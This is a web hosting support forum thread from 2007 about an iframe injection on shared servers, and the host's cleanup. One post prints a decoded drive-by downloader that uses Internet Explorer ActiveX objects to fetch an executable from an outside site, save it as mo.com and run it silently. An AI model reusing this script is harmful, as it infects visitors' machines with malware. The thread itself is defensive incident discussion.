UK WEB HOSTING FORUM FOR DISCUSSION ON WEB HOSTING SERVICE AND SUPPORT
LINUX HOSTING WINDOWS HOSTING PACKAGES SHOPPING CART OSCOMMERCE ZEN CART AGORA
ECOMMERCE HOSTING ASP MSSQL FRONTPAGE HOSTING PHP MYSQL HOSTING DISCUSSION FORUM
CPANEL RESELLER HOSTING DEDICATED SERVER VPS HOSTING PLESK VIRTUOZZO
Quick Search
Your forum announcement here!

  UK Web Hosting | Dedicated Server Windows and Linux VPS Forum > Web Hosting and Domains > Web Hosting Forum

Reply
 
LinkBack Thread Tools Search this Thread Display Modes
  #1 (permalink)  
Old 03-01-2007, 17:13
thecheekymonkey's Avatar
Member
 
Join Date: Nov 2005
Location: Lancashire, UK
Posts: 75
Send a message via MSN to thecheekymonkey
Default web hosting account infected with some sort of malware / virus!!!!!!!!!!

ok, a few people have mailed me now with regards to my website hosting.


www. consoleworkshop.co.uk

(only click if you have firewall / antivirus installed)

basically as soon as you click on my website hosting, my AVG goes crazy saying that its found a threat (mo.com)

i`ll click heal and it will continuosly try to download it again and again.

not it aint my pc, as ive just freshly formatted it.
it isnt the antivirus software as ive tried
AVG internet security
AVG Page Ranking
Zone alarm
norton internet security
Panda


all the same, its either a threat or unknown virus.

searching the web has given me little info.


however i did find this pst on a forum

www. pcadvisor.co.uk/forums/index.cfm?action =showthread&threadid=267579&forumid=13



they seem to think its to do with the host.


driving me crazy this now, so can anyone help?
__________________
www.consoleworkshop.co.uk
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #2 (permalink)  
Old 03-01-2007, 18:17
daledavies's Avatar
Premium Member
 
Join Date: Oct 2006
Location: North Wales
Posts: 356
Default

your website hosting seems to work fine at my end, i use mcafee and its fully updated.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #3 (permalink)  
Old 03-01-2007, 18:38
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 360
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default

Your website hosting is infected
Have a look at the source of your index.htm page
you will see a hidden iframe pointing to mortimercomprehensive
that is causing the problem - it is trying to d/load malware
see my thread in the resellers support forum Malware Links on Server
ALL accounts on that server have been compromised in a similar way. EUK have partially solved the problem - but are taking a very relaxed attitude to fixing it properly. My opinion of them is decending rapidly
Regards
David
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #4 (permalink)  
Old 03-01-2007, 19:55
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,774
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com Send a message via Skype™ to eUKhost.com
Default

Hello kieron,

What David has mentioned about the injection is right but the problem is sorted now. There was no way to replace the iframe code completely but we managed to modify the injected code to make it a 404 iframe. 404 iframe wont load and that way it wont make any problems.

Following command was ran successfully to modify the injected code :-

replace "mortimercomprehensive" "google" -- /home/username/public_html/index.*

&

replace "mortimercomprehensive" "google" -- /home/username/public_html/*/index.*

I wont agree with the other thing mentioned by David. I can provide you with the logs of kernel upgrades attempted in last 3 months and similar thing never happened in past. We are proud of knowledge of our system admins but it didn't work for jaguar.eukhost.com.

We paid other well known system admins as well but they had no success. Finally things got sorted on 26th Dec 2006 but some website hosting were still having the injection which didn't get replaced.

I can assure you that similar thing wont happen on jaguar.eukhost.com again for at least next 1 year as the kernel is good for next 1 year but we will have same problem again after 1 year. I'll ensure that we get the hardware replaced after 1 year coz we cannot afford to go through the same trauma once again.

To Mr. David: Things always look good from the other end but one who has to go through it knows the pain involved.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #5 (permalink)  
Old 03-01-2007, 20:47
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 360
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default At last

At last EUK appear to have fixed the problem - It's only taken 3 weeks to run that replace command properly!!

The reason you noticed 'mo.com' is cos the link d/loads a file and calls it mo.com which it then tries to run.

If you follow the iframe links you'll find it leads to some encrypted code which translates as below:
Code:
html>

script type="text/javascript" language="javascript">
var i = 0;
var t = new Array(
'BD96C556-65A3-11D0-983A-00C04FC29E36',
'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
'0006F033-0000-0000-C000-000000000046',
'0006F03A-0000-0000-C000-000000000046',
'6E32070A-766D-4EE6-879C-DC1FA91D2FC3',
'6414512B-B978-451D-A0D8-FCFDF33E833C',
'7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
'06723E09-F4C2-43c8-8358-09FCD1DB0766',
'639F725F-1B2D-4831-A9FD-874847682010',
'BA018599-1DB3-44f9-83B4-461454C84BF8',
'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
'E8CCCDDF-CA28-496b-B050-6C07C962476B'
);

function fgr() {
return true;
}
window.onerror = fgr;

function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}

function DoIt()
{
x.Open('GET','hxxp://mortimercomprehensive.co.uk/images/opennight/thumbs/tmp1/ld.exe',false);
x.Send();
var fname1 = 'mo.com';
var f = CreateO(xml,'Scripting.FileSystemObject');
var tmp = f.GetSpecialFolder(2);
fname1 = f.BuildPath(tmp,fname1);
S.open();
S.write(x.responseBody);
S.savetofile(fname1,2);
S.close();
var Q = CreateO(xml,'Shell.Application');
Q.ShellExecute(fname1,'','','open',0);
}

/script>
/head>
body>
script type="text/javascript" language="JavaScript">
if (navigator.userAgent.indexOf('MSIE') != -1) {
while (t[i]) {

var xml = null;

xml = document.createElement('object');
xml.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
n_xml = 'Microsoft.XMLHTTP';
var x = xml.CreateObject(n_xml,"");
a1 = 'ADO';
a2 = 'DB.';
a3 = 'Str';
a4 = 'eam';
str1 = a1 + a2 + a3 + a4;
str5 = str1;
if (xml) {
var S = CreateO(xml,str5);
if (S) {
S.type = 1;
str6 = 'GET';
DoIt();
}
}
}
}





Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #6 (permalink)  
Old 03-01-2007, 20:58
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,774
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com Send a message via Skype™ to eUKhost.com
Default

It wont happen now as it will give a 404 ifram url which wont make any difference.

Not sure why support people were not able to run the replace command for internal subdirectories of accounts but this should be sufficient for me to forward to our CTO.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #7 (permalink)  
Old 03-01-2007, 22:45
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 360
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default

you might also want to run the replace on index*.* as one of my website hostings had a file indexesp.htm infected
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #8 (permalink)  
Old 03-01-2007, 23:03
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,774
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com Send a message via Skype™ to eUKhost.com
Default

I did that but it found only one file ( indexold.htm ) inside one public_html of a customer. command could penetrate to one more directory only so anything thats 2 directories inside cannot be reached ( ex : public_html/subdirectory/otherdirectory/indexesp.htm )
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #9 (permalink)  
Old 05-01-2007, 20:04
Member
 
Join Date: Sep 2006
Posts: 73
Default

Mark - seems as though server 64.38.20.134 may be infected as well.

There is an iframe with a strange link on the index.htm of aruncontrolsystems.co.uk

Please advise! I will raise a ticket!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #10 (permalink)  
Old 05-01-2007, 22:16
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,774
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com Send a message via Skype™ to eUKhost.com
Default

Both servers had same configuration and both were setup at the same time. We managed to upgrade kernel on both on same day in the month of Dec 2006.

I've executed the replace command which has sorted this iframe injection.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 16:33.

 

Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by Web Hosting 3.1.0
Copyright © 2001-2008, eUKhost.com. All rights reserved.

 
Site Map

VPS Hosting
VPS Hosting plans

Dedicated Server Hosting
Dedicated Server plans

Business Web Hosting
100% uptime Hosting

Cpanel Hosting
cPanel Shared Hosting

Reseller Hosting
Reseller Web Hosting

Windows Hosting
Windows Shared Hosting

Windows VPS

Windows VPS Hosting

Semi Dedicated Servers
Semi-Dedicated Hosting

Dedicated Server Mirroring
Dedicated Server Mirroring

Webhosting Knowledgebase
Frequently asked Questions

Web Hosting Blog
eUKhost Blog

Web Hosting Support
Support Helpdesk

UK Data Center
eUKhost Datacenter

Web Hosting Forum
eUKhost Forum

Support Tutorials
Online Flash Tutorials

Offsite Back-up Plans
Remote Backup Service

Customer Testimonials
eUK Customer Testimonials


knowledgebase articles

eUKhost.com Services

Pre-Sales Questions
Pre-sales FAQ's

Domain Names
Domain registration FAQ's

cPanel Hosting
cPanel Hosting FAQ's

Windows Web Hosting
Plesk Control Panel

Reseller Hosting
Reseller Hosting FAQ's

VPS Hosting
Virtual Private Server

Semi-Dedicated Servers
Semi-Dedicated FAQ's

Dedicated Servers
Dedicated Server Hosting


popular blog categories


Web Hosting
Website Hosting articles

UK Web Hosting
UK Hosting articles

Dedicated Server Hosting
Dedicated Server guidelines

VPS Hosting
VPS hosting articles

cPanel Hosting
cPanel Hosting articles

Linux Operating System
Linux Operating techniques

Windows Web Hosting
Windows plesk articles

Web Hosting
Web Hosting Service